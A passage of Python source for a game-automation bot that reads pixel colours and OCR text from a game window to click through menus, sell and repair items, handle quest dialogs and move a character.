d, e, f = [int(i) for i in image[0][-1]]
if a + d < 50:
if b + e > 480:
if c + f > 290 and c+f < 320:
return True
return False
def detect_endlevel_bonus_area(gamename):
wincap = WindowCapture(gamename, [503, 487, 514, 589])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 400:
if b + e > 400:
if c + f > 400:
return True
return False
def detect_in_dungeon(wincap=False):
if not wincap:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [1090, 331, 1092, 353])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[-1][0]]
if d < 20:
if a + b + e > 400 and a+b+e < 500:
if c + f > 480:
return True
return False
def detect_go(gamename):
wincap = WindowCapture(gamename, [623, 247, 628, 249])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
if a < 30:
if b > 240:
if c > 140:
return True
return False
def detect_one_card(gamename):
# Cards only show up once one has been picked
# Therefore need to check against bronze, gold, silver
wincap = WindowCapture(gamename, [833, 44, 835, 46])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
# Bronze
if a == 27:
if b == 48:
if c == 87:
return True
# Silver
if a == 139:
if b == 139:
if c == 139:
return True
# Gold
if a == 38:
if b == 129:
if c == 160:
return True
return False
def detect_yes_no(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [516, 426, 541, 441])
image = wincap.get_screenshot()
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=Yes'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if result == "Yes":
return True
wincap = WindowCapture(gamename, [748, 426, 775, 441])
image = wincap.get_screenshot()
cv2.imwrite("testytest.jpg", image)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=No'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if result == "No":
return True
return False
def detect_resurrect_prompt(gamename):
wincap = WindowCapture(gamename, [763, 490, 818, 492])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 500:
if b + e > 500:
if c + f > 500:
return True
return False
def detect_store(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [1084, 265, 1099, 267])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
g, h, i = [int(i) for i in image[0][4]]
if a + b+c+d+e+f > 1500:
# Value of 7 is disabled shop
if g == 8:
return True
return False
class RHClick:
def click_yes(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+528, wincap.window_rect[1]+433)
def click_no(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+763, wincap.window_rect[1]+433)
def click_otherworld_ok(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+503, wincap.window_rect[1]+487)
def click_otherworld_no(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+778, wincap.window_rect[1]+487)
def click_choose_map(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+210)
def click_explore_again(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+152)
def click_back_to_town(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+328)
def click_map_number(gamename, mapnum):
wincap = WindowCapture(gamename)
map_to_clickpoints = {
5: (728, 521),
6: (640, 631),
7: (605, 455),
8: (542, 350),
9: (293, 297),
10: (777, 406),
11: (140, 370),
12: (500, 246),
13: (500, 672),
14: (419, 478),
15: (423, 263),
16: (563, 562),
17: (642, 432),
18: (249, 325)
}
x, y = map_to_clickpoints[mapnum]
pydirectinput.click(wincap.window_rect[0]+x, wincap.window_rect[1]+y)
def choose_difficulty_and_enter(gamename, diff):
wincap = WindowCapture(gamename)
num_clicks = 0
if diff == "N":
num_clicks = 0
elif diff == "H":
num_clicks = 1
elif diff == "VH":
num_clicks == 2
elif diff == "BM":
num_clicks == 3
for i in range(num_clicks):
pydirectinput.click(
wincap.window_rect[0]+618, wincap.window_rect[1]+333)
time.sleep(0.3)
# Then click on enter dungeon
pydirectinput.click(
wincap.window_rect[0]+1033, wincap.window_rect[1]+736)
def go_to_change_character(gamename):
if not BotUtils.detect_menu_open(gamename):
pydirectinput.press('esc')
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+363)
def exit_game(gamename):
if not BotUtils.detect_menu_open(gamename):
pydirectinput.press('esc')
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+480)
time.sleep(0.2)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+428)
def choose_character(gamename, charnum):
wincap = WindowCapture(gamename)
char_clickpoints = {
1: (1100, 140),
2: (1100, 210),
3: (1100, 280),
4: (1100, 350),
5: (1100, 420),
6: (1100, 490),
7: (1100, 560),
8: (1100, 630)
}
if charnum > 8:
pydirectinput.click(
wincap.window_rect[0]+1165, wincap.window_rect[1]+680)
x, y = char_clickpoints[charnum-8]
else:
pydirectinput.click(
wincap.window_rect[0]+1035, wincap.window_rect[1]+680)
x, y = char_clickpoints[charnum]
time.sleep(0.2)
pydirectinput.click(wincap.window_rect[0]+x, wincap.window_rect[1]+y)
time.sleep(0.2)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+765)
class Vision:
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED):
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, max_results=15, epsilon=0.5):
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
rectangles = []
for loc in locations:
rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
rectangles.append(rect)
rectangles.append(rect)
rectangles, weights = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=epsilon)
return rectangles
def get_click_points(self, rectangles):
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
top_left = (x, y)
bottom_right = (x + w, y + h)
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
def draw_crosshairs(self, haystack_img, points):
# BGR
marker_color = (255, 0, 255)
marker_type = cv2.MARKER_CROSS
for (center_x, center_y) in points:
cv2.drawMarker(haystack_img, (center_x, center_y),
marker_color, marker_type)
return haystack_img
class DynamicFilter:
TRACKBAR_WINDOW = "Trackbars"
# create gui window with controls for adjusting arguments in real-time
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED):
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, epsilon=0.5):
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
rectangles = []
for loc in locations:
rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
rectangles.append(rect)
rectangles.append(rect)
rectangles, weights = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=epsilon)
return rectangles
def get_click_points(self, rectangles):
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
top_left = (x, y)
bottom_right = (x + w, y + h)
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
def draw_crosshairs(self, haystack_img, points):
# BGR
marker_color = (255, 0, 255)
marker_type = cv2.MARKER_CROSS
for (center_x, center_y) in points:
cv2.drawMarker(haystack_img, (center_x, center_y),
marker_color, marker_type)
return haystack_img
def init_control_gui(self):
cv2.namedWindow(self.TRACKBAR_WINDOW, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.TRACKBAR_WINDOW, 350, 700)
# required callback. we'll be using getTrackbarPos() to do lookups
# instead of using the callback.
def nothing(position):
pass
# create trackbars for bracketing.
# OpenCV scale for HSV is H: 0-179, S: 0-255, V: 0-255
cv2.createTrackbar('HMin', self.TRACKBAR_WINDOW, 0, 179, nothing)
cv2.createTrackbar('SMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('HMax', self.TRACKBAR_WINDOW, 0, 179, nothing)
cv2.createTrackbar('SMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
# Set default value for Max HSV trackbars
cv2.setTrackbarPos('HMax', self.TRACKBAR_WINDOW, 179)
cv2.setTrackbarPos('SMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('VMax', self.TRACKBAR_WINDOW, 255)
# trackbars for increasing/decreasing saturation and value
cv2.createTrackbar('SAdd', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('SSub', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VAdd', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VSub', self.TRACKBAR_WINDOW, 0, 255, nothing)
# returns an HSV filter object based on the control GUI values
def get_hsv_filter_from_controls(self):
# Get current positions of all trackbars
hsv_filter = HsvFilter()
hsv_filter.hMin = cv2.getTrackbarPos('HMin', self.TRACKBAR_WINDOW)
hsv_filter.sMin = cv2.getTrackbarPos('SMin', self.TRACKBAR_WINDOW)
hsv_filter.vMin = cv2.getTrackbarPos('VMin', self.TRACKBAR_WINDOW)
hsv_filter.hMax = cv2.getTrackbarPos('HMax', self.TRACKBAR_WINDOW)
hsv_filter.sMax = cv2.getTrackbarPos('SMax', self.TRACKBAR_WINDOW)
hsv_filter.vMax = cv2.getTrackbarPos('VMax', self.TRACKBAR_WINDOW)
hsv_filter.sAdd = cv2.getTrackbarPos('SAdd', self.TRACKBAR_WINDOW)
hsv_filter.sSub = cv2.getTrackbarPos('SSub', self.TRACKBAR_WINDOW)
hsv_filter.vAdd = cv2.getTrackbarPos('VAdd', self.TRACKBAR_WINDOW)
hsv_filter.vSub = cv2.getTrackbarPos('VSub', self.TRACKBAR_WINDOW)
return hsv_filter
def apply_hsv_filter(self, original_image, hsv_filter=None):
hsv = cv2.cvtColor(original_image, cv2.COLOR_BGR2HSV)
if not hsv_filter:
hsv_filter = self.get_hsv_filter_from_controls()
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
return img
class RgbFilter:
def __init__(self, rMin=None, gMin=None, bMin=None, rMax=None, gMax=None, bMax=None):
self.rMin = rMin
self.gMin = gMin
self.bMin = bMin
self.rMax = rMax
self.gMax = gMax
self.bMax = bMax
class VisionRGB:
TRACKBAR_WINDOW = "Trackbars"
needle_img = None
needle_w = 0
needle_h = 0
method = None
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED) -> None:
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
# Save the dimensions of the needle image
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, max_results=15, epsilon=0.5):
# run the OpenCV algorithm
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
# Grab results above threshold
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
# if we found no results
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
# First we need to create the list of [x, y, w, h] rectangles
rectangles = []
for loc in locations:
rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
# Add every box to the list twice in order to retain single (non-overlapping) boxes
rectangles.append(rect)
rectangles.append(rect)
# Apply group rectangles.
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=epsilon)
if len(rectangles) > max_results:
rectangles = rectangles[:max_results]
return rectangles
# create gui window with controls for adjusting arguments in real-time
def init_control_gui(self):
cv2.namedWindow(self.TRACKBAR_WINDOW, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.TRACKBAR_WINDOW, 350, 400)
# required callback. we'll be using getTrackbarPos() to do lookups
# instead of using the callback.
def nothing(position):
pass
# create trackbars for bracketing.
# OpenCV scale for HSV is H: 0-179, S: 0-255, V: 0-255
cv2.createTrackbar('rMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('gMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('bMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('rMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('gMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('bMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
# Set default value for Max HSV trackbars
cv2.setTrackbarPos('rMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('gMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('bMax', self.TRACKBAR_WINDOW, 255)
# returns an HSV filter object based on the control GUI values
def get_rgb_filter_from_controls(self):
# Get current positions of all trackbars
rgb_filter = RgbFilter()
rgb_filter.rMin = cv2.getTrackbarPos('rMin', self.TRACKBAR_WINDOW)
rgb_filter.gMin = cv2.getTrackbarPos('gMin', self.TRACKBAR_WINDOW)
rgb_filter.bMin = cv2.getTrackbarPos('bMin', self.TRACKBAR_WINDOW)
rgb_filter.rMax = cv2.getTrackbarPos('rMax', self.TRACKBAR_WINDOW)
rgb_filter.gMax = cv2.getTrackbarPos('gMax', self.TRACKBAR_WINDOW)
rgb_filter.bMax = cv2.getTrackbarPos('bMax', self.TRACKBAR_WINDOW)
return rgb_filter
def apply_rgb_filter(self, original_image, rgb_filter=None):
# if we haven't been given a defined filter, use the filter values from the GUI
if not rgb_filter:
rgb_filter = self.get_rgb_filter_from_controls()
# Then apply the filter
thresh = cv2.inRange(original_image, np.array(
[rgb_filter.bMin, rgb_filter.gMin, rgb_filter.rMin]), np.array([rgb_filter.bMax, rgb_filter.gMax, rgb_filter.rMax]))
# return thresh
combined_mask_inv = 255 - thresh
# combined_mask_inv = thresh
combined_mask_rgb = cv2.cvtColor(combined_mask_inv, cv2.COLOR_GRAY2BGR)
return cv2.max(original_image, combined_mask_rgb)
def get_click_points(self, rectangles):
points = []
# Loop over all the rectangles
for (x, y, w, h) in rectangles:
# Determine the center position
center_x = x + int(w/2)
center_y = y + int(h/2)
# Save the points
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# these colors are actually BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
# determine the box positions
top_left = (x, y)
bottom_right = (x + w, y + h)
# draw the box
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
def draw_crosshairs(self, haystack_img, points):
marker_color = (255, 0, 255)
marker_type = cv2.MARKER_CROSS
for (center_x, center_y) in points:
# draw the center point
cv2.drawMarker(haystack_img, (center_x, center_y),
marker_color, marker_type)
return haystack_img
class SellRepair():
def __init__(self, rarity_cutoff=1, last_row_protect=True) -> None:
# rarities are as follows:
# nocolour=0, green=1, blue=2
self.cutoff = rarity_cutoff
# this is for whether lastrow in equip is protected
# useful for characters levelling with next upgrades ready
self.last_row_protect = last_row_protect
with open("gamename.txt") as f:
self.gamename = f.readline()
self.inventory_wincap = WindowCapture(
self.gamename, [512, 277, 775, 430])
# This is for correct mouse positioning
self.game_wincap = WindowCapture(self.gamename)
self.shop_check_wincap = WindowCapture(
self.gamename, [274, 207, 444, 208])
# These are for holding reference rgb values
# Using sets as can then compare easily to other sets
self.empty = {41, 45, 50}
self.rar_green = {2, 204, 43}
self.rar_blue = {232, 144, 5}
self.rar_none = {24, 33, 48}
self.junk_list = self.grab_junk_list()
def grab_junk_list(self):
jl = []
with open("itemrgb.txt") as f:
lines = f.readlines()
for line in lines:
_, rgb = line.split("|")
r, g, b = rgb.split(",")
jl.append({int(r), int(g), int(b)})
return jl
def ident_sell_repair(self):
self.game_wincap.update_window_position(border=False)
self.shop_check_wincap.update_window_position(border=False)
self.open_store_if_necessary()
# First go through all the equipment
self.change_tab("Equipment")
# time.sleep(0.2)
# self.hover_mouse_all()
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_rarities_equip(non_empty, screenshot)
self.sell(junk_list, "Equipment")
# Then go through all the other loot
self.change_tab("Other")
# time.sleep(0.2)
# self.hover_mouse_all()
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_items_other(non_empty, screenshot)
self.sell(junk_list)
# and finally repair gear
self.repair()
# and now go through all the steps again minus repair to make sure
self.change_tab("Equipment")
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_rarities_equip(non_empty, screenshot)
self.sell(junk_list, "Equipment")
self.change_tab("Other")
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_items_other(non_empty, screenshot)
self.sell(junk_list)
def open_store_if_necessary(self):
# This will search to see if the inventory is open
# in the correct spot and then click shop if not
screenshot = self.shop_check_wincap.get_screenshot()
pix1 = screenshot[0, 0]
pix1 = int(pix1[0]) + int(pix1[1]) + int(pix1[2])
pix2 = screenshot[0, 169]
pix2 = int(pix2[0]) + int(pix2[1]) + int(pix2[2])
if pix1 == 103 and pix2 == 223:
pass
else:
# need to open the store
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
ctypes.windll.user32.SetCursorPos(offsetx+610, offsety-10)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def change_tab(self, name):
self.game_wincap.update_window_position(border=False)
x = self.game_wincap.window_rect[0] + 534-60
if name == "Equipment":
y = self.game_wincap.window_rect[1] + 277 - 15
elif name == "Other":
y = self.game_wincap.window_rect[1] + 277 + 44
ctypes.windll.user32.SetCursorPos(x, y)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def hover_mouse_all(self):
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
for i in range(4):
for j in range(6):
x = offsetx+j*44
y = offsety+i*44
ctypes.windll.user32.SetCursorPos(x-10, y)
time.sleep(0.03)
ctypes.windll.user32.SetCursorPos(x, y)
time.sleep(0.03)
ctypes.windll.user32.SetCursorPos(x+10, y)
ctypes.windll.user32.SetCursorPos(offsetx, offsety-70)
# ctypes.windll.user32.SetCursorPos(offsetx+610, offsety-10)
def remove_empty(self, screenshot):
non_empty = []
for i in range(4):
for j in range(6):
colour = set(screenshot[i*44, 22+j*44])
if colour != self.empty:
non_empty.append([i, j])
# format will be as follows of return list
# x,y,r,g,b
return non_empty
def identify_rarities_equip(self, rowcol_list, screenshot):
junk = []
for rowcol in rowcol_list:
colour = set(screenshot[rowcol[0]*44, rowcol[1]*44])
if colour == self.rar_none:
junk.append([rowcol[0], rowcol[1]])
elif colour == self.rar_green:
if self.cutoff >= 1:
junk.append([rowcol[0], rowcol[1]])
elif colour == self.rar_green:
if self.cutoff >= 2:
junk.append([rowcol[0], rowcol[1]])
# format will be as follows of return list
# x,y corresponding to row,col
return junk
def identify_items_other(self, rowcol_list, screenshot):
junk = []
for rowcol in rowcol_list:
colour = set(screenshot[rowcol[0]*44, 22+rowcol[1]*44])
if colour in self.junk_list:
junk.append([rowcol[0], rowcol[1]])
# format will be as follows of return list
# x,y corresponding to row,col
return junk
def sell(self, rowcol_list, tab="Other"):
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
for item in rowcol_list:
if tab == "Equipment":
if self.last_row_protect:
if item[0] == 3:
continue
x = offsetx+item[1]*44
y = offsety+item[0]*44
ctypes.windll.user32.SetCursorPos(x, y)
time.sleep(0.1)
ctypes.windll.user32.mouse_event(
0x0008, 0, 0, 0, 0)
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0010, 0, 0, 0, 0)
# Then click a second time to be sure
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0008, 0, 0, 0, 0)
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0010, 0, 0, 0, 0)
def repair(self):
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
ctypes.windll.user32.SetCursorPos(offsetx-310, offsety+325)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
ctypes.windll.user32.SetCursorPos(offsetx+0, offsety+180)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
# this is if everything is already repaired
ctypes.windll.user32.SetCursorPos(offsetx+100, offsety+180)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
class QuestHandle():
def __init__(self) -> None:
with open("gamename.txt") as f:
gamename = f.readline()
self.game_wincap = WindowCapture(gamename)
self.white_text_filter = HsvFilter(
0, 0, 102, 45, 65, 255, 0, 0, 0, 0)
self.yellow_text_filter = HsvFilter(
16, 71, 234, 33, 202, 255, 0, 0, 0, 0)
self.blue_text_filter = HsvFilter(
83, 126, 85, 102, 255, 255, 0, 0, 0, 0)
self.all_text_filter = HsvFilter(
0, 0, 61, 78, 255, 255, 0, 255, 0, 0)
self.vision = Vision('xprompt67filtv2.jpg')
self.accept_rect = [725, 525, 925, 595]
self.accept_wincap = WindowCapture(gamename, self.accept_rect)
self.skip_rect = [730, 740, 890, 780]
self.skip_wincap = WindowCapture(gamename, self.skip_rect)
self.next_rect = [880, 740, 1040, 780]
self.next_wincap = WindowCapture(gamename, self.next_rect)
self.quest_rect = [310, 160, 1055, 650]
self.quest_wincap = WindowCapture(gamename, self.quest_rect)
self.questlist_rect = [740, 240, 1050, 580]
self.questlist_wincap = WindowCapture(gamename, self.questlist_rect)
self.complete_wincap = WindowCapture(gamename, self.next_rect)
self.xprompt_rect = [1130, 670, 1250, 720]
self.xprompt_wincap = WindowCapture(gamename, self.xprompt_rect)
def start_quest_handle(self):
start_time = time.time()
while time.time() < start_time + 2:
if self.check_for_accept():
break
def convert_and_click(self, x, y, rect):
self.game_wincap.update_window_position(border=False)
truex = int(x + self.game_wincap.window_rect[0] + rect[0])
truey = int(y + self.game_wincap.window_rect[1] + rect[1])
ctypes.windll.user32.SetCursorPos(truex, truey)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def check_for_accept(self):
image = self.accept_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Accept" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.accept_rect)
detection = True
break
if not detection:
return self.check_for_skip()
else:
return True
def check_for_skip(self):
image = self.skip_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Skip" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.skip_rect)
detection = True
break
if not detection:
return self.check_for_next()
else:
return True
def check_for_next(self):
image = self.next_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Next" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.next_rect)
detection = True
break
if not detection:
return self.check_for_quest()
else:
return True
def check_for_quest(self):
image = self.quest_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=Quest'
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng', config=tess_config)
detection = False
for i in range(0, len(results["text"])):
if "Quest" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.quest_rect)
detection = True
break
if not detection:
return self.check_for_questlist()
else:
return True
def check_for_questlist(self):
image = self.questlist_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.all_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "LV" in results["text"][i]:
# at this point need to grab the centre of the rect
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
# and then click at this position
self.convert_and_click(x, y, self.questlist_rect)
detection = True
break
if not detection:
return self.check_for_complete()
else:
return True
def check_for_complete(self):
image = self.complete_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Com" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.next_rect)
detection = True
break
if not detection:
return self.check_for_xprompt()
else:
return True
def check_for_xprompt(self):
image = self.xprompt_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.blue_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Press" in results["text"][i]:
pydirectinput.keyDown("x")
time.sleep(0.1)
pydirectinput.keyUp("x")
detection = True
break
if not detection:
return False
else:
return True
class Follower():
def __init__(self, margin=2) -> None:
self.pressed_keys = []
self.last_press = {
"right": time.time() - 5,
"up": time.time() - 5,
"down": time.time() - 5,
"left": time.time() - 5
}
self.relx = 0
self.rely = 0
self.margin = margin
def release_all_keys(self):
for key in self.pressed_keys:
CustomInput.release_key(CustomInput.key_map[key], key)
def navigate_towards(self, x, y):
self.relx = x
self.rely = y
if self.relx > self.margin:
# Check if opposite key held down
if "left" in self.pressed_keys:
self.pressed_keys.remove("left")
CustomInput.release_key(CustomInput.key_map["left"], "left")
# Check that wasn't very recently pressed
if time.time() - self.last_press["right"] < 0.21:
pass
# Check that not already being held down
elif "right" not in self.pressed_keys:
self.last_press["right"] = time.time()
